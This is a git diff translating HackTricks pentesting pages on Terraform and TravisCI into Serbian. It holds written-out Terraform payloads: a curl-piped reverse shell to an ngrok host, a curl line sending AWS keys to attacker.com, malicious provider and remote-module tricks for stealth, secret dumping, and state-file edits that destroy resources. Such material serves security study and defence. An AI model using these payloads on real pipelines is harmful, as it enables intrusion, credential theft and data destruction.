+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
 }
 ```
+**Korišćenje prilagođenog provajdera**
 
-**Using a custom provider**
-
-An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
-
+Napadač bi mogao poslati [prilagođenog provajdera](https://learn.hashicorp.com/tutorials/terraform/provider-setup) na [Terraform Registry](https://registry.terraform.io/) i zatim ga dodati u Terraform kod u funkcionalnoj grani ([primer odavde](https://alex.kaskaso.li/post/terraform-plan-rce)):
 ```javascript
- terraform {
-        required_providers {
-            evil = {
-                source  = "evil/evil"
-                    version = "1.0"
-            }
-        }
-    }
+terraform {
+required_providers {
+evil = {
+source  = "evil/evil"
+version = "1.0"
+}
+}
+}
 
 provider "evil" {}
 ```
+Provajder se preuzima u `init` i izvršiće maliciozni kod kada se izvrši `plan`
 
-The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
+Možete pronaći primer na [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
 
-You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
+**Korišćenje spoljnog reference**
 
-**Using an external reference**
-
-Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+Obe pomenute opcije su korisne, ali nisu baš diskretne (druga je diskretnija, ali složenija od prve). Ovaj napad možete izvesti čak i na **diskretniji način**, prateći ove sugestije:
 
+- Umesto da direktno dodate rev shell u terraform datoteku, možete **učitati spoljnji resurs** koji sadrži rev shell:
 ```javascript
 module "not_rev_shell" {
-  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
 }
 ```
+Možete pronaći rev shell kod na [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
 
-You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
-
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- U spoljnim resursima, koristite **ref** funkciju da sakrijete **terraform rev shell kod u grani** unutar repozitorijuma, nešto poput: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
 
 ### Terraform Apply
 
-Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
-
+Terraform apply će biti izvršen da primeni sve promene, takođe ga možete zloupotrebiti da dobijete RCE injektovanjem **malicioznog Terraform fajla sa** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Samo treba da se uverite da neki payload poput sledećih završi u `main.tf` fajlu:
 ```json
 // Payload 1 to just steal a secret
 resource "null_resource" "secret_stealer" {
-  provisioner "local-exec" {
-    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
-  }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
 }
 
 // Payload 2 to get a rev shell
 resource "null_resource" "rev_shell" {
-  provisioner "local-exec" {
-    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
-  }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
 }
 ```
+Sledite **preporukama iz prethodne tehnike** da izvršite ovaj napad na **diskretniji način koristeći spoljne reference**.
 
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
-
-## Secrets Dumps
-
-You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
+## Izvori tajni
 
+Možete imati **tajne vrednosti koje koristi terraform izbačene** pokretanjem `terraform apply` dodavanjem nečega poput:
 ```json
 output "dotoken" {
-  value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
 }
 ```
+## Zloupotreba Terraform State Fajlova
 
-## Abusing Terraform State Files
+U slučaju da imate pristup za pisanje nad terraform state fajlovima, ali ne možete da menjate terraform kod, [**ova istraživanja**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) nude neke zanimljive opcije za korišćenje fajla:
 
-In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+### Brisanje resursa 
 
-### Deleting resources 
+Postoje 2 načina da uništite resurse:
 
-There are 2 ways to destroy resources:
-
-1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
-
-Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+1. **Umetnite resurs sa nasumičnim imenom u state fajl koji pokazuje na pravi resurs koji treba uništiti**
 
+Pošto će terraform videti da resurs ne bi trebao da postoji, uništiće ga (prateći pravi ID resursa koji je naznačen). Primer sa prethodne strane:
 ```json
 {
-  "mode": "managed",
-  "type": "aws_instance",
-  "name": "example",
-  "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
-  "instances": [
-    {
-      "attributes": {
-        "id": "i-1234567890abcdefg"
-      }
-    }
-  ]
+"mode": "managed",
+"type": "aws_instance",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+"instances": [
+{
+"attributes": {
+"id": "i-1234567890abcdefg"
+}
+}
+]
 },
 ```
+2. **Izmenite resurs za brisanje na način da nije moguće ažurirati (tako da će biti obrisan i ponovo kreiran)**
 
-2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
-
-For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+Za EC2 instancu, izmena tipa instance je dovoljna da terraform obriše i ponovo je kreira.
 
 ### RCE
 
-It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
-
+Takođe je moguće [napraviti prilagođeni provajder](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) i jednostavno zameniti jednog od provajdera u terraform state datoteci za zlonamerni ili dodati prazan resurs sa zlonamernim provajderom. Primer iz originalnog istraživanja:
 ```json
 "resources": [
 {
-  "mode": "managed",
-  "type": "scaffolding_example",
-  "name": "example",
-  "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
-  "instances": [
+"mode": "managed",
+"type": "scaffolding_example",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+"instances": [
 
-  ]
+]
 },
 ```
+### Zamena crne liste provajdera
 
-### Replace blacklisted provider
-
-In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
-
+U slučaju da naiđete na situaciju gde je `hashicorp/external` stavljen na crnu listu, možete ponovo implementirati `external` provajder na sledeći način. Napomena: Koristimo fork external provajdera objavljen od strane https://registry.terraform.io/providers/nazarewk/external/latest. Možete objaviti svoj vlastiti fork ili ponovnu implementaciju.
 ```terraform
 terraform {
-  required_providers {
-    external = {
-      source  = "nazarewk/external"
-      version = "3.0.0"
-    }
-  }
+required_providers {
+external = {
+source  = "nazarewk/external"
+version = "3.0.0"
+}
+}
 }
 ```
-
-Then you can use `external` as per normal.
-
+Zatim možete koristiti `external` kao i obično.
 ```terraform
 data "external" "example" {
-  program = ["sh", "-c", "whoami"]
+program = ["sh", "-c", "whoami"]
 }
 ```
-
 ## Automatic Audit Tools
 
 ### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
 
-Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
+Snyk nudi sveobuhvatno rešenje za skeniranje Infrastructure as Code (IaC) koje otkriva ranjivosti i pogrešne konfiguracije u Terraform, CloudFormation, Kubernetes i drugim IaC formatima.
 
 - **Features:**
-  - Real-time scanning for security vulnerabilities and compliance issues.
-  - Integration with version control systems (GitHub, GitLab, Bitbucket).
-  - Automated fix pull requests.
-  - Detailed remediation advice.
-- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
-
+- Skeniranje u realnom vremenu za sigurnosne ranjivosti i probleme usklađenosti.
+- Integracija sa sistemima za kontrolu verzija (GitHub, GitLab, Bitbucket).
+- Automatizovani zahtevi za ispravke.
+- Detaljna uputstva za otklanjanje problema.
+- **Sign Up:** Kreirajte nalog na [Snyk](https://snyk.io/).
 ```bash
 brew tap snyk/tap
 brew install snyk
 snyk auth
 snyk iac test /path/to/terraform/code
 ```
-
 ### [Checkov](https://github.com/bridgecrewio/checkov) 
 
-**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
+**Checkov** je alat za statičku analizu koda za infrastrukturu kao kod (IaC) i takođe alat za analizu sastava softvera (SCA) za slike i open source pakete.
 
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
-
-It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
+Skenira cloud infrastrukturu obezbeđenu pomoću [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), ili [OpenTofu](https://opentofu.org/) i otkriva bezbednosne i usklađenosti greške u konfiguraciji koristeći skeniranje zasnovano na grafu.
 
+Izvodi [analizu sastava softvera (SCA) skeniranje](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) koja je skeniranje open source paketa i slika za zajedničke ranjivosti i izloženosti (CVE).
 ```bash
 pip install checkov
 checkov -d /path/to/folder
 ```
-
 ### [terraform-compliance](https://github.com/terraform-compliance/cli)
 
-From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
+From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` je lagan, bezbednosno i usklađenosti fokusiran test okvir protiv terraform-a koji omogućava negativne testne sposobnosti za vašu infrastrukturu kao kod.
 
-- **compliance:** Ensure the implemented code is following security standards, your own custom standards
-- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
-- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
-- **pre-deploy:** it validates your code before it is deployed
-- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
-- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
+- **usaglašenost:** Osigurajte da implementirani kod prati bezbednosne standarde, vaše sopstvene prilagođene standarde
+- **razvoj vođen ponašanjem:** Imamo BDD za gotovo sve, zašto ne i za IaC?
+- **prenosiv:** samo ga instalirajte iz `pip` ili ga pokrenite putem `docker`. Pogledajte [Instalacija](https://terraform-compliance.com/pages/installation/)
+- **pre-deploy:** validira vaš kod pre nego što bude implementiran
+- **lako za integraciju:** može se pokrenuti u vašem pipeline-u (ili u git hooks) kako bi se osiguralo da su sve implementacije validirane.
+- **razdvajanje dužnosti:** možete čuvati svoje testove u drugom repozitorijumu gde je odgovorna posebna ekipa.
 
 > [!NOTE]
-> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
-
+> Nažalost, ako kod koristi neke provajdere kojima nemate pristup, nećete moći da izvršite `terraform plan` i pokrenete ovaj alat.
 ```bash
 pip install terraform-compliance
 terraform plan -out=plan.out
 terraform-compliance -f /path/to/folder
 ```
-
 ### [tfsec](https://github.com/aquasecurity/tfsec)
 
-From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
-
-- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
-- ⛔ Hundreds of built-in rules
-- 🪆 Scans modules (local and remote)
-- ➕ Evaluates HCL expressions as well as literal values
-- ↪️ Evaluates Terraform functions e.g. `concat()`
-- 🔗 Evaluates relationships between Terraform resources
-- 🧰 Compatible with the Terraform CDK
-- 🙅 Applies (and embellishes) user-defined Rego policies
-- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
-- 🛠️ Configurable (via CLI flags and/or config file)
-- ⚡ Very fast, capable of quickly scanning huge repositories
+From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec koristi statičku analizu vašeg terraform koda da bi uočio potencijalne pogrešne konfiguracije.
 
+- ☁️ Proverava pogrešne konfiguracije kod svih glavnih (i nekih manjih) provajdera u oblaku
+- ⛔ Stotine ugrađenih pravila
+- 🪆 Skenira module (lokalne i udaljene)
+- ➕ Evaluira HCL izraze kao i literalne vrednosti
+- ↪️ Evaluira Terraform funkcije npr. `concat()`
+- 🔗 Evaluira odnose između Terraform resursa
+- 🧰 Kompatibilan sa Terraform CDK
+- 🙅 Primena (i obogaćivanje) korisnički definisanih Rego politika
+- 📃 Podržava više formata izlaza: lepi (podrazumevani), JSON, SARIF, CSV, CheckStyle, JUnit, tekst, Gif.
+- 🛠️ Konfigurisanje (putem CLI zastavica i/ili konfiguracione datoteke)
+- ⚡ Veoma brzo, sposobno da brzo skenira ogromne repozitorijume
 ```bash
 brew install tfsec
 tfsec /path/to/folder
 ```
-
 ### [KICKS](https://github.com/Checkmarx/kics)
 
-Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
-
-**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
+Pronađite sigurnosne ranjivosti, probleme usklađenosti i greške u konfiguraciji infrastrukture rano u razvoju vaše infrastrukture kao koda uz **KICS** od Checkmarx-a.
 
+**KICS** označava **K**eeping **I**nfrastructure as **C**ode **S**ecure, otvorenog je koda i neophodan je za svaki projekat zasnovan na oblaku.
 ```bash
 docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
 ```
-
 ### [Terrascan](https://github.com/tenable/terrascan)
 
-From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
-
-- Seamlessly scan infrastructure as code for misconfigurations.
-- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
-- Detect security vulnerabilities and compliance violations.
-- Mitigate risks before provisioning cloud native infrastructure.
-- Offers flexibility to run locally or integrate with your CI\CD.
+Iz [**dokumentacije**](https://github.com/tenable/terrascan): Terrascan je statički analizator koda za infrastrukturu kao kod. Terrascan vam omogućava da:
 
+- Besprekorno skenirate infrastrukturu kao kod za pogrešne konfiguracije.
+- Pratite obezbeđenu cloud infrastrukturu za promene konfiguracije koje uvode promene u bezbednosti, i omogućava vraćanje na sigurnu poziciju.
+- Otkrivate bezbednosne ranjivosti i kršenja usklađenosti.
+- Ublažavate rizike pre nego što obezbedite cloud native infrastrukturu.
+- Nudi fleksibilnost za lokalno pokretanje ili integraciju sa vašim CI\CD.
 ```bash
 brew install terrascan
 ```
-
-## References
+## Reference
 
 - [Atlantis Security](atlantis-security.md)
 - [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -310,7 +280,3 @@ brew install terrascan
 - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md
index 63a3bb5c8..75eb445bd 100644
--- a/src/pentesting-ci-cd/todo.md
+++ b/src/pentesting-ci-cd/todo.md
@@ -2,7 +2,7 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+Github PRs su dobrodošli koji objašnjavaju kako (zlo)upotrebljavati te platforme iz perspektive napadača
 
 - Drone
 - TeamCity
@@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke
 - Rancher
 - Mesosphere
 - Radicle
-- Any other CI/CD platform...
+- Bilo koja druga CI/CD platforma...
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md
index cff623392..8abeb990f 100644
--- a/src/pentesting-ci-cd/travisci-security/README.md
+++ b/src/pentesting-ci-cd/travisci-security/README.md
@@ -2,68 +2,64 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## What is TravisCI
+## Šta je TravisCI
 
-**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+**Travis CI** je **hostovana** ili na **mestu** **usluga kontinuirane integracije** koja se koristi za izgradnju i testiranje softverskih projekata hostovanih na nekoliko **različitih git platformi**.
 
 {{#ref}}
 basic-travisci-information.md
 {{#endref}}
 
-## Attacks
+## Napadi
 
-### Triggers
+### Okidači
 
-To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+Da biste pokrenuli napad, prvo morate znati kako da pokrenete izgradnju. Po defaultu, TravisCI će **pokrenuti izgradnju na push-evima i pull zahtevima**:
 
 ![](<../../images/image (145).png>)
 
-#### Cron Jobs
+#### Cron poslovi
 
-If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+Ako imate pristup web aplikaciji, možete **postaviti cron-ove za pokretanje izgradnje**, što može biti korisno za postizanje postojanosti ili za pokretanje izgradnje:
 
 ![](<../../images/image (243).png>)
 
 > [!NOTE]
-> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+> Izgleda da nije moguće postaviti cron-ove unutar `.travis.yml` prema [ovome](https://github.com/travis-ci/travis-ci/issues/9162).
 
-### Third Party PR
+### PR-ovi trećih strana
 
-TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+TravisCI po defaultu onemogućava deljenje env varijabli sa PR-ovima koji dolaze od trećih strana, ali neko može to omogućiti i tada možete kreirati PR-ove za repozitorij i eksfiltrirati tajne:
 
 ![](<../../images/image (208).png>)
 
-### Dumping Secrets
+### Ispumpavanje tajni
 
-As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+Kao što je objašnjeno na stranici [**osnovne informacije**](basic-travisci-information.md), postoje 2 tipa tajni. **Tajne varijable okruženja** (koje su navedene na web stranici) i **prilagođene enkriptovane tajne**, koje su pohranjene unutar `.travis.yml` datoteke kao base64 (napomena da će obe, kada su pohranjene enkriptovane, završiti kao varijable okruženja na konačnim mašinama).
 
-- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
-- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+- Da biste **enumerisali tajne** konfigurirane kao **varijable okruženja**, idite na **postavke** **projekta** i proverite listu. Međutim, imajte na umu da će sve varijable okruženja projekta postavljene ovde pojaviti kada pokrenete izgradnju.
+- Da biste enumerisali **prilagođene enkriptovane tajne**, najbolje što možete učiniti je da **proverite `.travis.yml` datoteku**.
+- Da biste **enumerisali enkriptovane datoteke**, možete proveriti za **`.enc` datoteke** u repozitorijumu, za linije slične `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` u konfiguracionoj datoteci, ili za **enkriptovane iv i ključeve** u **varijablama okruženja** kao što su:
 
 ![](<../../images/image (81).png>)
 
 ### TODO:
 
-- Example build with reverse shell running on Windows/Mac/Linux
-- Example build leaking the env base64 encoded in the logs
+- Primer izgradnje sa reverznim shell-om koji radi na Windows/Mac/Linux
+- Primer izgradnje koja otkriva env base64 kodirane u logovima
 
 ### TravisCI Enterprise
 
-If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+Ako napadač završi u okruženju koje koristi **TravisCI enterprise** (više informacija o tome šta je to u [**osnovnim informacijama**](basic-travisci-information.md#travisci-enterprise)), moći će da **pokrene izgradnje u Worker-u.** To znači da će napadač moći da se lateralno pomera ka tom serveru sa kojeg bi mogao da:
 
-- escape to the host?
-- compromise kubernetes?
-- compromise other machines running in the same network?
-- compromise new cloud credentials?
+- pobegne na host?
+- kompromituje kubernetes?
+- kompromituje druge mašine koje rade u istoj mreži?
+- kompromituje nove cloud kredencijale?
 
-## References
+## Reference
 
 - [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
 - [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
index 46b10bf38..8405151b0 100644
--- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
+++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -1,48 +1,45 @@
-# Basic TravisCI Information
+# Osnovne informacije o TravisCI
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Access
+## Pristup
 
-TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
+TravisCI se direktno integriše sa različitim git platformama kao što su Github, Bitbucket, Assembla i Gitlab. Pitaće korisnika da da TravisCI dozvole za pristup repozitorijumima koje želi da integriše sa TravisCI.
 
-For example, in Github it will ask for the following permissions:
+Na primer, u Github-u će tražiti sledeće dozvole:
 
-- `user:email` (read-only)
-- `read:org` (read-only)
-- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
+- `user:email` (samo za čitanje)
+- `read:org` (samo za čitanje)
+- `repo`: Daje pristup za čitanje i pisanje koda, statusa commit-a, saradnika i statusa implementacije za javne i privatne repozitorijume i organizacije.
 
-## Encrypted Secrets
+## Enkriptovane Tajne
 
-### Environment Variables
+### Promenljive Okruženja
 
-In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
+U TravisCI, kao i na drugim CI platformama, moguće je **sačuvati na nivou repozitorijuma tajne** koje će biti sačuvane enkriptovane i biće **dekriptovane i postavljene u promenljivu okruženja** mašine koja izvršava gradnju.
 
 ![](<../../images/image (203).png>)
 
-It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
+Moguće je naznačiti **grane na kojima će tajne biti dostupne** (podrazumevano sve) i takođe da li TravisCI **treba da sakrije njenu vrednost** ako se pojavi **u logovima** (podrazumevano hoće).
 
-### Custom Encrypted Secrets
+### Prilagođene Enkriptovane Tajne
 
-For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository.
-
-You can access the public key of one repo with:
+Za **svaki repozitorijum** TravisCI generiše **RSA ključni par**, **čuva** **privatni** ključ, i čini **javnim ključem repozitorijuma dostupnim** onima koji imaju **pristup** repozitorijumu.
 
+Možete pristupiti javnom ključu jednog repozitorijuma sa:
 ```
 travis pubkey -r /
 travis pubkey -r carlospolop/t-ci-test
 ```
-
-Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
+Zatim, možete koristiti ovu postavku da **enkriptujete tajne i dodate ih u vaš `.travis.yaml`**. Tajne će biti **dekriptovane kada se izgradnja pokrene** i dostupne u **promenljivim okruženja**.
 
 ![](<../../images/image (139).png>)
 
-Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
+Imajte na umu da tajne enkriptovane na ovaj način neće biti navedene u promenljivim okruženja podešavanja.
 
-### Custom Encrypted Files
-
-Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
+### Prilagođene Enkriptovane Datoteke
 
+Na isti način kao i pre, TravisCI takođe omogućava da **enkriptujete datoteke i zatim ih dekriptujete tokom izgradnje**:
 ```
 travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
 
@@ -52,7 +49,7 @@ storing secure env variables for decryption
 
 Please add the following to your build script (before_install stage in your .travis.yml, for instance):
 
-    openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
+openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
 
 Pro Tip: You can add it automatically by running with --add.
 
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository.
 Make sure not to add super_secret.txt to the git repository.
 Commit all changes to your .travis.yml.
 ```
-
-Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
+Napomena da će prilikom enkripcije datoteke 2 Env Varijable biti konfigurisane unutar repozitorijuma kao što su:
 
 ![](<../../images/image (170).png>)
 
 ## TravisCI Enterprise
 
-Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
+Travis CI Enterprise je **on-prem verzija Travis CI**, koju možete implementirati **u svojoj infrastrukturi**. Zamislite ‘server’ verziju Travis CI. Korišćenje Travis CI omogućava vam da omogućite jednostavan sistem Kontinuirane Integracije/Kontinuirane Isporuke (CI/CD) u okruženju koje možete konfigurisati i obezbediti kako želite.
 
-**Travis CI Enterprise consists of two major parts:**
+**Travis CI Enterprise se sastoji od dva glavna dela:**
 
-1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
-2. TCI **Worker** and build environment images (also called OS images).
